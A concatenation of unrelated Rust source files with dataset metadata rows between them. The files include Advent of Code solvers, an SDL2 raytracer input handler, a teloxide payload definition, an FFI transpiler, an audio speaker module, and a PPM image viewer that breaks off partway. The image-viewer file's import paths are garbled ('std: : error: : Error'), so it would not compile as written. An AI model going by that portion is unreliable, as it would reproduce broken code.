                Intcode::Jit(m1, m2) => {
                    let (p_a, p_b) = (
                        mem_get(&self.mem, self.rel, self.pc + 1, m1),
                        mem_get(&self.mem, self.rel, self.pc + 2, m2),
                    );
                    if p_a != 0 {
                        self.pc = p_b as usize;
                    } else {
                        self.pc += 3;
                    }
                }
                Intcode::Jif(m1, m2) => {
                    let (p_a, p_b) = (
                        mem_get(&self.mem, self.rel, self.pc + 1, m1),
                        mem_get(&self.mem, self.rel, self.pc + 2, m2),
                    );
                    if p_a == 0 {
                        self.pc = p_b as usize;
                    } else {
                        self.pc += 3;
                    }
                }
                Intcode::Lt(m1, m2, m3) => {
                    let (p_a, p_b) = (
                        mem_get(&self.mem, self.rel, self.pc + 1, m1),
                        mem_get(&self.mem, self.rel, self.pc + 2, m2),
                    );
                    mem_set(&mut self.mem, self.rel, self.pc + 3, m3, (p_a < p_b) as i64);
                    self.pc += 4;
                }
                Intcode::Equ(m1, m2, m3) => {
                    let (p_a, p_b) = (
                        mem_get(&self.mem, self.rel, self.pc + 1, m1),
                        mem_get(&self.mem, self.rel, self.pc + 2, m2),
                    );
                    mem_set(
                        &mut self.mem,
                        self.rel,
                        self.pc + 3,
                        m3,
                        (p_a == p_b) as i64,
                    );
                    self.pc += 4;
                }
                Intcode::Adj(m1) => {
                    let p_a = mem_get(&self.mem, self.rel, self.pc + 1, m1);
                    self.rel = (self.rel as i64 + p_a) as usize;
                    self.pc += 2;
                }
                Intcode::Halt => {
                    break;
                }
            }
        }
        None
    }
}
/// Wraps an Intcode [`Cpu`] and drives it as the tractor-beam probe drone.
#[derive(Debug)]
struct Drone {
    cpu: Cpu,
}
impl Drone {
    /// Builds a drone around a freshly loaded Intcode program.
    fn new() -> Drone {
        Drone { cpu: Cpu::new() }
    }
    /// Sends the probe coordinates (x first, then y) to the program and
    /// returns its answer (1 = pulled by the beam, 0 = not), or `None` if
    /// the program halts without replying.
    fn feed_pos(&mut self, p: Pos) -> Option<i64> {
        let mut slot = Some(p.0);
        // The first run just consumes x; any value it returns is irrelevant.
        self.cpu.run(&mut slot);
        slot = Some(p.1);
        self.cpu.run(&mut slot)
    }
}
/// Debug helper: dumps the scanned bounding box to stdout, one row per line
/// ('#' = beam, '.' = empty or unscanned); panics on any other cell value.
#[allow(dead_code)]
fn draw_map(tilemap: &HashMap<Pos, i64>) {
    // Bounding box of everything scanned so far.
    let min_x = tilemap.keys().map(|p| p.0).min().unwrap();
    let max_x = tilemap.keys().map(|p| p.0).max().unwrap();
    let min_y = tilemap.keys().map(|p| p.1).min().unwrap();
    let max_y = tilemap.keys().map(|p| p.1).max().unwrap();
    for row in min_y..=max_y {
        print!("{:2}: ", row);
        let rendered: String = (min_x..=max_x)
            .map(|col| match *tilemap.get(&(col, row)).unwrap_or(&0) {
                0 => '.',
                1 => '#',
                _ => panic!("rip"),
            })
            .collect();
        println!("{}", rendered);
    }
}
/// Returns true when the 100x100 square whose top-left corner is `p` is
/// entirely covered by the beam (every cell recorded as 1 in `tilemap`;
/// missing cells count as 0).
fn check_sq(p: Pos, tilemap: &TileMap) -> bool {
    let (left, top) = p;
    (top..top + 100)
        .all(|y| (left..left + 100).all(|x| *tilemap.get(&(x, y)).unwrap_or(&0) == 1))
}
/// Scans row `y_start` left to right for the first x where a 100x100 square
/// of beam fits (top-left anchored at `(x, y_start)`); returns the puzzle
/// answer `x * 10000 + y_start`, or `None` if no such square exists.
fn check_from_y(tilemap: &TileMap, y_start: i64) -> Option<i64> {
    // Only columns we have actually scanned can possibly be filled.
    let max_x = tilemap.keys().map(|p| p.0).max().unwrap();
    // Fix: pass `tilemap` directly instead of the original's `&tilemap`
    // (a needless `&&TileMap` that relied on deref coercion).
    (0..=max_x)
        .find(|&x| check_sq((x, y_start), tilemap))
        .map(|x| x * 10000 + y_start)
}
fn main() {
    // Scan results: (x, y) -> 1 if the tractor beam covers the cell, else 0.
    let mut tilemap: HashMap<Pos, i64> = HashMap::new();
    let mut drone = Drone::new();
    // need to reset cpu for some reason
    // (the Intcode program answers a single probe then halts, so every probe
    // restarts from this pristine copy)
    let back = drone.cpu.clone();
    let mut sum = 0;
    // Part 1: probe the 50x50 area and count the beam-covered cells.
    for y in 0..=49 {
        for x in 0..=49 {
            drone.cpu = back.clone();
            let p = (x, y);
            let r = drone.feed_pos(p).expect("no resp");
            tilemap.insert(p, r);
            sum += r;
        }
    }
    println!("Part 1: {}", sum);
    // Part 2: extend the scan row by row, then try to fit a 100x100 square
    // whose TOP row is y - 100 (so its bottom row is the row just scanned).
    for y in 0.. {
        let mut detected = false;
        for x in 0..y {
            drone.cpu = back.clone();
            let p = (x, y);
            let r = drone.feed_pos(p).expect("no resp");
            tilemap.insert(p, r);
            if r == 1 {
                detected = true;
            }
            // Past the right edge of the beam on this row: stop scanning it.
            if r == 0 && detected {
                break;
            }
        }
        if let Some(p2) = check_from_y(&tilemap, y - 100) {
            println!("Part 2: {}", p2);
            break;
        }
    }
}
| true |
01333d959f4ce4d37227b696131b3169e492c3de
|
Rust
|
swerdloj/wgpu-raytracer
|
/src/application.rs
|
UTF-8
| 4,664 | 2.8125 | 3 |
[] |
no_license
|
use sdl2::{
keyboard::{Keycode, KeyboardState, Scancode},
event::{Event, WindowEvent}, mouse::MouseButton,
};
use crate::system::{Message, Runnable, SDL2};
use crate::camera::Camera;
use crate::raytrace::RayTracer;
/// Input-driven application state: owns the camera and the mouse-capture
/// flag used by the `Runnable` implementation below.
pub struct ApplicationState {
    // Application state
    camera: Camera,
    // True while the mouse is captured (hidden, relative motion reported).
    relative_mouse_mode: bool,
    // Set whenever input moved/rotated the camera; consumed in fixed_update.
    camera_changed_this_frame: bool,
}
impl ApplicationState {
    /// Creates the initial state: default camera, mouse captured.
    pub fn new() -> Self {
        Self {
            camera: Camera::new(0.02),
            relative_mouse_mode: true,
            camera_changed_this_frame: false,
        }
    }
    /// Flips relative mouse mode and pushes the new setting to SDL.
    fn toggle_relative_mouse_mode(&mut self, sdl2: &SDL2) {
        let on = !self.relative_mouse_mode;
        self.set_relative_mouse_mode(sdl2, on);
    }
    /// Sets relative mouse mode to an explicit value and informs SDL.
    fn set_relative_mouse_mode(&mut self, sdl2: &SDL2, on: bool) {
        self.relative_mouse_mode = on;
        sdl2.set_relative_mouse_mode(on);
    }
}
impl Runnable for ApplicationState {
    /// Called once at startup. Relies on `ApplicationState::new()` having
    /// set `relative_mouse_mode` to `true` so the field and SDL stay in sync.
    fn init(&mut self, sdl2: &SDL2) {
        // Always begin with relative_mouse_mode on
        sdl2.set_relative_mouse_mode(true);
    }
    /// Per-event handler; the returned `Message` tells the system whether to
    /// quit, consume the event, restart the progressive render, or do nothing.
    fn update(&mut self, sdl2: &SDL2, raytracer: &mut RayTracer, event: &Event) -> Message {
        // Dereference the event so values are not behind references
        match *event {
            // Escape: first press releases the mouse; a second press quits.
            Event::KeyDown { keycode: Some(Keycode::Escape), .. } => {
                if self.relative_mouse_mode {
                    // Unfreeze mouse
                    self.toggle_relative_mouse_mode(sdl2);
                    // Mouse moves while hidden. Move it to center for convenience.
                    sdl2.center_mouse_in_window();
                } else {
                    return Message::Quit;
                }
                Message::ConsumeEvent
            }
            // Losing / regaining window focus releases / recaptures the mouse.
            Event::Window { win_event: WindowEvent::FocusLost, .. } => {
                self.set_relative_mouse_mode(sdl2, false);
                Message::ConsumeEvent
            }
            Event::Window { win_event: WindowEvent::FocusGained, .. } => {
                self.set_relative_mouse_mode(sdl2, true);
                Message::ConsumeEvent
            }
            // Clicking back into the window recaptures the mouse.
            Event::MouseButtonDown { mouse_btn: MouseButton::Left, .. } => {
                if !self.relative_mouse_mode {
                    self.toggle_relative_mouse_mode(sdl2);
                }
                Message::ConsumeEvent
            }
            // Mouse look, only while captured; any motion dirties the camera.
            Event::MouseMotion { xrel, yrel, .. } => {
                if self.relative_mouse_mode {
                    self.camera.update_angle(xrel as f32, yrel as f32);
                    self.camera_changed_this_frame = true;
                    Message::RestartRender
                } else {
                    Message::Nothing
                }
            }
            // Scroll wheel zooms via the vertical field of view.
            // NOTE(review): RestartRender is returned even when update_fov
            // reports no change — confirm that is intended.
            Event::MouseWheel { y, .. } => {
                if self.camera.update_fov(-2.0 * y as f32) {
                    println!("Vertical FoV: {}", self.camera.v_fov);
                    self.camera_changed_this_frame = true;
                }
                Message::RestartRender
            }
            // R: restart the render from sample zero.
            Event::KeyDown { keycode: Some(Keycode::R), .. } => {
                println!("Restarting render");
                raytracer.pause_rendering = false;
                raytracer.reset_samples();
                Message::ConsumeEvent
            }
            _ => { Message::Nothing }
        }
    }
    /// Fixed-timestep update: polls held keys for WASD + vertical movement
    /// and pushes the camera to the raytracer when anything changed.
    fn fixed_update(&mut self, _sdl2: &SDL2, keys: &KeyboardState, raytracer: &mut RayTracer) {
        let mut translation = cgmath::Vector3::new(0f32, 0.0, 0.0);
        if keys.is_scancode_pressed(Scancode::W) { // Forwards
            translation.z -= 0.05;
        }
        if keys.is_scancode_pressed(Scancode::A) { // Left
            translation.x -= 0.02;
        }
        if keys.is_scancode_pressed(Scancode::S) { // Backwards
            translation.z += 0.05;
        }
        if keys.is_scancode_pressed(Scancode::D) { // Right
            translation.x += 0.02;
        }
        if keys.is_scancode_pressed(Scancode::LShift) { // Up
            translation.y += 0.05;
        }
        if keys.is_scancode_pressed(Scancode::LCtrl) { // Down
            translation.y -= 0.05;
        }
        // Movement un-pauses the renderer and marks the camera dirty.
        if translation != cgmath::Vector3::new(0.0, 0.0, 0.0) {
            self.camera.update_position(translation.x, translation.y, translation.z);
            self.camera_changed_this_frame = true;
            raytracer.pause_rendering = false;
        }
        // Push the camera (whether moved here or in update()) exactly once.
        if self.camera_changed_this_frame {
            raytracer.update_camera(&self.camera);
        }
        self.camera_changed_this_frame = false;
    }
}
| true |
ffb602611641af8d32a983c4e1e24c386896aeb3
|
Rust
|
teloxide/teloxide
|
/crates/teloxide-core/src/payloads/create_invoice_link.rs
|
UTF-8
| 3,741 | 2.953125 | 3 |
[
"MIT"
] |
permissive
|
//! Generated by `codegen_payloads`, do not edit by hand.
use serde::Serialize;
use crate::types::LabeledPrice;
// Invocation of teloxide's `impl_payload!` macro: it declares the
// `CreateInvoiceLink` payload type (with the derives below, including
// `Serialize`) and its `CreateInvoiceLinkSetters` helper.
// Plain `//` comments are stripped by the lexer before macro matching, so
// they are invisible to the macro; the `///` doc comments ARE macro input.
impl_payload! {
    /// Use this method to create a link for an invoice. Returns the created invoice link as String on success.
    #[derive(Debug, PartialEq, Eq, Hash, Clone, Serialize)]
    pub CreateInvoiceLink (CreateInvoiceLinkSetters) => String {
        // Fields every call must provide.
        required {
            /// Product name, 1-32 characters
            pub title: String [into],
            /// Product description, 1-255 characters
            pub description: String [into],
            /// Bot-defined invoice payload, 1-128 bytes. This will not be displayed to the user, use for your internal processes.
            pub payload: String [into],
            /// Payments provider token, obtained via [Botfather]
            ///
            /// [Botfather]: https://t.me/botfather
            pub provider_token: String [into],
            /// Three-letter ISO 4217 currency code, see more on currencies
            pub currency: String [into],
            /// Price breakdown, a JSON-serialized list of components (e.g. product price, tax, discount, delivery cost, delivery tax, bonus, etc.)
            pub prices: Vec<LabeledPrice> [collect],
        }
        // Fields that may be omitted; a setter is generated for each.
        // NOTE(review): photo_size/photo_width/photo_height are typed
        // `String` here although the Telegram Bot API documents them as
        // integers — this file is codegen output ("do not edit by hand"),
        // so any fix belongs in `codegen_payloads`.
        optional {
            /// The maximum accepted amount for tips in the smallest units of the currency (integer, **not** float/double). For example, for a maximum tip of `US$ 1.45` pass `max_tip_amount = 145`. See the exp parameter in [`currencies.json`], it shows the number of digits past the decimal point for each currency (2 for the majority of currencies). Defaults to 0
            ///
            /// [`currencies.json`]: https://core.telegram.org/bots/payments/currencies.json
            pub max_tip_amount: u32,
            /// A JSON-serialized array of suggested amounts of tips in the smallest units of the currency (integer, **not** float/double). At most 4 suggested tip amounts can be specified. The suggested tip amounts must be positive, passed in a strictly increased order and must not exceed _max_tip_amount_.
            pub suggested_tip_amounts: Vec<u32> [collect],
            /// A JSON-serialized data about the invoice, which will be shared with the payment provider. A detailed description of required fields should be provided by the payment provider.
            pub provider_data: String [into],
            /// URL of the product photo for the invoice. Can be a photo of the goods or a marketing image for a service. People like it better when they see what they are paying for.
            pub photo_url: String [into],
            /// Photo size in bytes
            pub photo_size: String [into],
            /// Photo width
            pub photo_width: String [into],
            /// Photo height
            pub photo_height: String [into],
            /// Pass _True_, if you require the user's full name to complete the order
            pub need_name: bool,
            /// Pass _True_, if you require the user's phone number to complete the order
            pub need_phone_number: bool,
            /// Pass _True_, if you require the user's email address to complete the order
            pub need_email: bool,
            /// Pass _True_, if you require the user's shipping address to complete the order
            pub need_shipping_address: bool,
            /// Pass _True_, if user's phone number should be sent to provider
            pub send_phone_number_to_provider: bool,
            /// Pass _True_, if user's email address should be sent to provider
            pub send_email_to_provider: bool,
            /// Pass _True_, if the final price depends on the shipping method
            pub is_flexible: bool,
        }
    }
}
| true |
6c01f3dc6092b4ded51df198d0544b19576e8d2c
|
Rust
|
yysofiyan/naskah
|
/src/lib.rs
|
UTF-8
| 1,426 | 2.71875 | 3 |
[
"MIT"
] |
permissive
|
#[macro_use]
extern crate nom;
extern crate regex;
mod ast;
mod parser;
mod printer;
use parser::parse;
use printer::js::print;
use std::ffi::CString;
use std::mem;
use std::os::raw::{c_char, c_void};
/// Parses naskah source and emits the equivalent JavaScript, or the fixed
/// Indonesian error string "salah sintaks" when the input fails to parse.
fn transpile_to_js(s: String) -> String {
    match parse(&s) {
        Ok(ast) => print(ast),
        Err(_) => String::from("salah sintaks"),
    }
}
/// Allocates `size` bytes on the Rust heap and hands ownership of the
/// pointer to the FFI/wasm caller. The buffer is deliberately leaked here;
/// the caller is responsible for returning it to Rust to be freed.
#[no_mangle]
pub extern "C" fn alloc(size: usize) -> *mut c_void {
    // Explicit element type: nothing else pins the `Vec<_>` parameter,
    // and a byte buffer is what the wasm side expects.
    let mut buf: Vec<u8> = Vec::with_capacity(size);
    let ptr = buf.as_mut_ptr();
    // Leak the buffer so it is not freed when `buf` goes out of scope.
    mem::forget(buf);
    ptr as *mut c_void
}
/// Frees a C string previously handed out by `transpile` (via
/// `CString::into_raw`). Must be called exactly once per such pointer.
#[no_mangle]
pub extern "C" fn dealloc_str(ptr: *mut c_char) {
    unsafe {
        // SAFETY: `ptr` must originate from `CString::into_raw`; rebuilding
        // the CString and dropping it releases the allocation.
        let _ = CString::from_raw(ptr);
    }
}
/// FFI entry point: consumes a caller-allocated C string of naskah source
/// and returns a newly allocated C string of JavaScript. The caller must
/// release the result via `dealloc_str`.
#[no_mangle]
pub extern "C" fn transpile(ptr: *mut c_char) -> *mut c_char {
    // Reclaim ownership of the caller's C string; it is freed on conversion.
    let input = unsafe { CString::from_raw(ptr) }.into_string().unwrap();
    let script = transpile_to_js(input);
    // Hand ownership of the result back across the FFI boundary.
    CString::new(script).unwrap().into_raw()
}
#[cfg(test)]
mod test {
    use super::*;
    // End-to-end checks of the pure-Rust transpile path (no FFI involved).
    #[test]
    fn ext_single() {
        // A single `misal` (variable) declaration becomes a JS `var`.
        let js = transpile_to_js(String::from("misal x = null;\n"));
        assert_eq!(js, String::from("var x = null;\n"));
    }
    #[test]
    fn ext_multi() {
        // Multiple statements transpile line by line; `benar` -> `true`.
        let js = transpile_to_js(String::from("misal x = null;\nmisal y = benar;\n"));
        assert_eq!(js, String::from("var x = null;\nvar y = true;\n"));
    }
}
| true |
0f4c26ab62e2e7308d3ac44a5bb5f9b0ba48ff1e
|
Rust
|
Arsalankhan1982/Rust_variableprogram
|
/variables/src/main.rs
|
UTF-8
| 225 | 3.21875 | 3 |
[] |
no_license
|
/// Counts down from 3 to 1 and announces liftoff.
/// (Removed the commented-out earlier exercise that was kept above `main`;
/// dead commented code only accumulates confusion.)
fn main() {
    // `.rev()` walks the exclusive range 1..4 backwards: 3, 2, 1.
    for number in (1..4).rev() {
        println!("{}!", number);
    }
    println!("LIFTOFF!!!");
}
| true |
30726ce2bd56f91bf6fe34980e2b1b6b3aa97d53
|
Rust
|
iCodeIN/advent-of-code-3
|
/crates/core/src/year2015/day15.rs
|
UTF-8
| 3,472 | 3.34375 | 3 |
[
"MIT"
] |
permissive
|
use crate::Input;
/// One cookie ingredient's properties (AoC 2015 day 15). All fields may be
/// negative except in practice `calories`.
struct Ingredient {
    capacity: i32,
    durability: i32,
    flavour: i32,
    texture: i32,
    // Only used by part two's "exactly 500 calories" constraint.
    calories: i32,
}
/// Scores one complete recipe: the product of the four (clamped) property
/// totals, or 0 for invalid recipes. `teaspoons[i]` is the amount of
/// `ingredients[i]`; in part two the recipe must also total 500 calories.
fn score_recipe(ingredients: &[Ingredient], teaspoons: &[i32], part2: bool) -> i32 {
    // A valid recipe uses exactly 100 teaspoons in total.
    if teaspoons.iter().sum::<i32>() != 100 {
        return 0;
    }
    let (mut capacity, mut durability, mut flavour, mut texture, mut calories) =
        (0, 0, 0, 0, 0);
    for (ingredient, &spoons) in ingredients.iter().zip(teaspoons) {
        capacity += ingredient.capacity * spoons;
        durability += ingredient.durability * spoons;
        flavour += ingredient.flavour * spoons;
        texture += ingredient.texture * spoons;
        calories += ingredient.calories * spoons;
    }
    // "If any properties had produced a negative total, it would have
    // instead become zero, causing the whole score to multiply to zero."
    if capacity <= 0 || durability <= 0 || flavour <= 0 || texture <= 0 {
        return 0;
    }
    // Part two additionally requires exactly 500 calories.
    if part2 && calories != 500 {
        return 0;
    }
    capacity * durability * flavour * texture
}
/// Exhaustive recursive search: tries every amount (0..=remaining spoons)
/// for the ingredient at `index`, recursing down the slice; a complete
/// assignment is scored by `score_recipe`. Returns the best score seen.
fn highest_score(
    ingredients: &[Ingredient],
    teaspoons: &mut [i32],
    index: usize,
    part2: bool,
) -> i32 {
    // Every ingredient has an amount: score this complete assignment.
    if index == teaspoons.len() {
        return score_recipe(ingredients, teaspoons, part2);
    }
    let spoons_used: i32 = teaspoons[..index].iter().sum();
    let mut best = 0;
    for amount in 0..=(100 - spoons_used) {
        teaspoons[index] = amount;
        best = best.max(highest_score(ingredients, teaspoons, index + 1, part2));
    }
    best
}
/// Parses the ingredient list and returns the best achievable cookie score
/// (part two additionally constrains the recipe to exactly 500 calories).
pub fn solve(input: &mut Input) -> Result<i32, String> {
    // All numeric parse failures map to the same static message.
    let error_mapper = |_| "Invalid number";
    let mut ingredients = Vec::new();
    for line in input.text.lines() {
        let words = line.split(' ').collect::<Vec<_>>();
        if words.len() != 11 || words.iter().any(|s| s.is_empty()) {
            return Err("Invalid line not consisting of 11 words".to_string());
        }
        // Numeric fields are followed by a comma (e.g. "-1,"); the slice
        // `[0..len - 1]` drops that trailing comma before parsing.
        let capacity = words[2][0..words[2].len() - 1]
            .parse::<i32>()
            .map_err(error_mapper)?;
        let durability = words[4][0..words[4].len() - 1]
            .parse::<i32>()
            .map_err(error_mapper)?;
        let flavour = words[6][0..words[6].len() - 1]
            .parse::<i32>()
            .map_err(error_mapper)?;
        let texture = words[8][0..words[8].len() - 1]
            .parse::<i32>()
            .map_err(error_mapper)?;
        // Calories is the final word, with no trailing comma.
        let calories = words[10].parse::<i32>().map_err(error_mapper)?;
        let ingredient = Ingredient {
            capacity,
            durability,
            flavour,
            texture,
            calories,
        };
        ingredients.push(ingredient);
    }
    // Exhaustively search all teaspoon distributions summing to 100.
    let mut teaspoons = vec![0; ingredients.len()];
    Ok(highest_score(
        &ingredients,
        &mut teaspoons,
        0,
        input.is_part_two(),
    ))
}
// Uses the crate-level `test_part_one!`/`test_part_two!` macros; the real
// puzzle input is compiled in via `include_str!`.
#[test]
pub fn tests() {
    use crate::{test_part_one, test_part_two};
    let example = "Butterscotch: capacity -1, durability -2, flavor 6, texture 3, calories 8
Cinnamon: capacity 2, durability 3, flavor -2, texture -1, calories 3";
    test_part_one!(example => 62_842_880);
    test_part_two!(example => 57_600_000);
    let real_input = include_str!("day15_input.txt");
    test_part_one!(real_input => 18_965_440);
    test_part_two!(real_input => 15_862_900);
}
| true |
de0798313764a7fdeda19c4b8347c2223def1adb
|
Rust
|
chatblanc-ciel/openrr
|
/arci-speak-audio/src/lib.rs
|
UTF-8
| 1,762 | 2.953125 | 3 |
[
"Apache-2.0"
] |
permissive
|
use arci::Speaker;
use std::{collections::HashMap, fs::File, io, path::Path, path::PathBuf};
use tracing::error;
use thiserror::Error;
/// Errors produced while resolving or playing a message's audio file.
#[derive(Error, Debug)]
#[non_exhaustive]
pub enum Error {
    /// Failed to open the audio file.
    #[error("io: {:?}", .0)]
    Io(#[from] std::io::Error),
    /// The file could not be decoded as audio.
    #[error("rodio: {:?}", .0)]
    Decoder(#[from] rodio::decoder::DecoderError),
    /// No audio output stream could be opened.
    #[error("rodio: {:?}", .0)]
    Stream(#[from] rodio::StreamError),
    /// Playback failed after the stream was opened.
    #[error("rodio: {:?}", .0)]
    Play(#[from] rodio::PlayError),
    /// The message has no registered audio file.
    #[error("not found: {:?}", .0)]
    HashNotFound(String),
}
pub struct AudioSpeaker {
message_to_file_path: HashMap<String, PathBuf>,
}
impl AudioSpeaker {
/// Creates a new `AudioSpeaker`.
pub fn new(hashmap: HashMap<String, PathBuf>) -> Self {
Self {
message_to_file_path: hashmap,
}
}
/// Similar to `Speaker::speak`, but returns an error when the command failed.
pub fn try_speak(&self, message: &str) -> Result<(), Error> {
match self.message_to_file_path.get(message) {
Some(path) => play_audio_file(path),
None => Err(Error::HashNotFound(message.to_string())),
}
}
}
impl Speaker for AudioSpeaker {
    /// Best-effort speak: plays the mapped audio file and logs (rather than
    /// propagates) any failure, since this trait method cannot return errors.
    fn speak(&self, message: &str) {
        if let Err(e) = self.try_speak(message) {
            // TODO: Speaker trait seems to assume that speak method will always succeed.
            error!("{}", e);
        }
    }
}
/// Plays the audio file at `path` and blocks until playback finishes.
fn play_audio_file(path: &Path) -> Result<(), Error> {
    // `_stream` is bound to a name (not `_`) on purpose: `_` would drop the
    // OutputStream immediately, which would stop playback.
    let (_stream, stream_handle) = rodio::OutputStream::try_default()?;
    let sink = rodio::Sink::try_new(&stream_handle)?;
    let file = File::open(path)?;
    // Decode lazily from a buffered reader and queue the source on the sink.
    let source = rodio::Decoder::new(io::BufReader::new(file))?;
    sink.append(source);
    // Block the calling thread until everything queued has been played.
    sink.sleep_until_end();
    Ok(())
}
| true |
0b2ba9e41144f73819463d5e397a3c5ae3f23801
|
Rust
|
kakikikki/rust_exercises
|
/fibonacci/src/main.rs
|
UTF-8
| 1,255 | 3.375 | 3 |
[
"MIT"
] |
permissive
|
use std::time::{Instant};
fn main() {
for number in (0..51).step_by(10) {
// Test simple rec
let start = Instant::now();
let result = fibonacci(number);
let duration = start.elapsed();
println!("Simple recursion: N: {:<3} Result: {} Time: {:?}", number, result, duration);
// Test fast_fib <3 shadowing
let start = Instant::now();
let result = fast_fib(number);
let duration = start.elapsed();
println!("Fast doubling: N: {:<3} Result: {} Time: {:?}", number, result, duration);
}
}
// Naive approach: plain textbook recursion, exponential time; kept only for
// the timing comparison against `fast_fib` in `main`.
fn fibonacci(n: isize) -> isize {
    match n {
        n if n < 2 => n,
        n => fibonacci(n - 1) + fibonacci(n - 2),
    }
}
// Fast doubling Rust port
// original algorithm written in python by
// https://www.nayuki.io/page/fast-fibonacci-algorithms

/// Public entry point: returns F(n) via the fast-doubling identities.
fn fast_fib(n: isize) -> isize {
    _fast_fib(n).0
}

/// Returns the pair (F(n), F(n+1)).
fn _fast_fib(n: isize) -> (isize, isize) {
    if n == 0 {
        return (0, 1);
    }
    // (F(k), F(k+1)) for k = n / 2.
    let (a, b) = _fast_fib(n / 2);
    // F(2k)   = F(k) * (2*F(k+1) - F(k))
    let c = a * (2 * b - a);
    // F(2k+1) = F(k)^2 + F(k+1)^2
    let d = a * a + b * b;
    if n % 2 == 0 {
        (c, d)
    } else {
        (d, c + d)
    }
}
| true |
4f245f612a126be7471e919347c1d0f16106655a
|
Rust
|
meirce/TicTacToe
|
/src/tictactoe/minmax.rs
|
UTF-8
| 2,142 | 3.3125 | 3 |
[] |
no_license
|
use failure::{err_msg, Error};
use std::collections::HashMap;
use super::board::Board;
/// A candidate move: the board cell to play and its minimax value.
#[derive(Clone, Copy)]
struct MoveValue {
    // Cell index 0..=8; 10 is a "no move" sentinel for terminal positions.
    cell: usize,
    value: i8,
}
/// Memoizing minimax solver for tic-tac-toe.
pub struct Minmax {
    // Cache of already-evaluated board positions.
    memory: HashMap<Board, MoveValue>
}
impl Minmax {
    /// Creates a solver with an empty memoization table.
    pub fn new() -> Self {
        Minmax { memory: HashMap::new() }
    }

    /// Returns the best cell (0..=8) for `player_value` (+1 / -1) on `board`.
    pub fn get_next_move(&mut self, board: &Board, player_value: &i8) -> Result<usize, Error> {
        Ok(self.minmax(board, *player_value)?.cell)
    }

    /// Memoized minimax. `turn` is the player to move; values are scored
    /// from +1's perspective, so each level maximizes `turn * value`.
    fn minmax(&mut self, board: &Board, turn: i8) -> Result<MoveValue, Error> {
        // Single cache lookup (the original did contains_key + get,
        // hashing the board twice).
        if let Some(cached) = self.memory.get(board) {
            return Ok(*cached);
        }
        let free_moves: Vec<usize> = board
            .data
            .iter()
            .enumerate()
            .filter(|(_, val)| **val == 0)
            .map(|(i, _)| i)
            .collect();
        // Depth = number of moves already played (9 cells total).
        let value = Minmax::eval_board(board, 9 - free_moves.len() as i8);
        if value != 0 {
            // Terminal position: somebody has already won; 10 = no move.
            return Ok(MoveValue { cell: 10, value });
        }
        if free_moves.is_empty() {
            // Board full with no winner: a draw, worth 0.
            return Ok(MoveValue { cell: 10, value: 0 });
        }
        // Evaluate every legal reply on a copy of the board.
        let mut next_boards: HashMap<usize, MoveValue> = HashMap::new();
        for next_move in free_moves {
            let mut new_board = board.clone();
            new_board.data[next_move] = turn;
            next_boards.insert(
                next_move,
                MoveValue {
                    cell: next_move,
                    value: self.minmax(&new_board, -turn)?.value,
                },
            );
        }
        // `turn * value` flips the sign so the same max works for both
        // players. Ties are broken by HashMap iteration order, i.e.
        // arbitrarily — same behavior as before.
        let best_move = *next_boards
            .iter()
            .max_by_key(|(_, j)| turn * j.value)
            .ok_or_else(|| err_msg("Could not find min/max valued move."))?
            .1;
        self.memory.insert((*board).clone(), best_move);
        Ok(best_move)
    }

    /// Scores a finished board: 0 when nobody has won; otherwise
    /// `winner * 10` minus a depth penalty so quicker wins score higher.
    /// (Dropped the redundant `depth as i8` cast — `depth` already is i8.)
    fn eval_board(board: &Board, depth: i8) -> i8 {
        match board.who_won() {
            0 => 0,
            winner_value => winner_value * 10 + (depth * -winner_value),
        }
    }
}
| true |
23f7fe88f58dbf3c3aa944a3bd096a63e2141594
|
Rust
|
BorisWauters/SecureSoftware_imgparser
|
/src/main.rs
|
UTF-8
| 5,216 | 2.90625 | 3 |
[] |
no_license
|
extern crate sdl2;
#[macro_use] extern crate simple_error;
use std: : error: : Error;
use std: : path: : Path;
use std: : fs: : File;
use std: : io: : {Read, Cursor};
use byteorder:: {LittleEndian, ReadBytesExt};
use std: : fmt;
use std: : io: : prelude:: *;
use std: : io: : {Seek, SeekFrom};
use sdl2: : pixels:: Color;
use sdl2: : rect: : Rect;
use shuteye: : sleep;
use std: : time: : Duration;
/// One RGB pixel; channels are 0-255 byte values widened to u32.
/// NOTE(review): the non-snake-case field names trigger compiler warnings;
/// renaming them would touch every user, so they are documented instead.
#[derive(Clone)]
struct Pixel
{
    R: u32,
    G: u32,
    B: u32
}
/// A decoded image. `pixels[0]` is the BOTTOM row of the picture:
/// `decode_ppm_image` stores rows reversed and `show_image` flips them back.
struct Image
{
    width : u32,
    height: u32,
    pixels: Vec<Vec<Pixel>>
}
/// Opens an SDL2 window sized to the image (clamped to the display size),
/// renders the image pixel by pixel, then blocks until the window is closed.
fn show_image(image: &Image)
{
    let sdl = sdl2::init().unwrap();
    let video_subsystem = sdl.video().unwrap();
    let display_mode = video_subsystem.current_display_mode(0).unwrap();
    // Clamp the window dimensions to the current display resolution.
    let w = match display_mode.w as u32 > image.width {
        true => image.width,
        false => display_mode.w as u32
    };
    let h = match display_mode.h as u32 > image.height {
        true => image.height,
        false => display_mode.h as u32
    };
    let window = video_subsystem
        .window("Image", w, h)
        .build()
        .unwrap();
    let mut canvas = window
        .into_canvas()
        .present_vsync()
        .build()
        .unwrap();
    let black = sdl2::pixels::Color::RGB(0, 0, 0);
    let mut event_pump = sdl.event_pump().unwrap();
    // render image
    canvas.set_draw_color(black);
    canvas.clear();
    for r in 0..image.height {
        for c in 0..image.width {
            // `pixels` is stored bottom-up, so flip the row index here.
            let pixel = &image.pixels[image.height as usize - r as usize - 1][c as usize];
            canvas.set_draw_color(Color::RGB(pixel.R as u8, pixel.G as u8, pixel.B as u8));
            canvas.fill_rect(Rect::new(c as i32, r as i32, 1, 1)).unwrap();
        }
    }
    canvas.present();
    // Keep the window alive until it is closed, polling events ~4x/second.
    'main: loop
    {
        for event in event_pump.poll_iter() {
            match event {
                sdl2::event::Event::Quit {..} => break 'main,
                _ => {},
            }
        }
        sleep(Duration::new(0, 250000000));
    }
}
/// Reads the next unsigned decimal number from `cursor`, skipping leading
/// whitespace. The delimiter following the digits is left unread (the cursor
/// is rewound one byte) so callers can inspect it.
///
/// Returns an error on EOF before any digit, on a non-digit byte inside the
/// number, or when the digits do not parse as `u32`.
///
/// Fixes vs. the original:
/// * `Read::read` returning `Ok(0)` (EOF) used to leave a stale byte in the
///   buffer, which made both loops spin forever at end of input.
/// * The `seek` results were silently discarded; they are now propagated.
/// * `b'0' ... b'9'` (deprecated) -> `b'0'..=b'9'`; bare trait object -> `dyn`.
fn read_num(cursor: &mut Cursor<Vec<u8>>) -> Result<u32, Box<dyn std::error::Error>> {
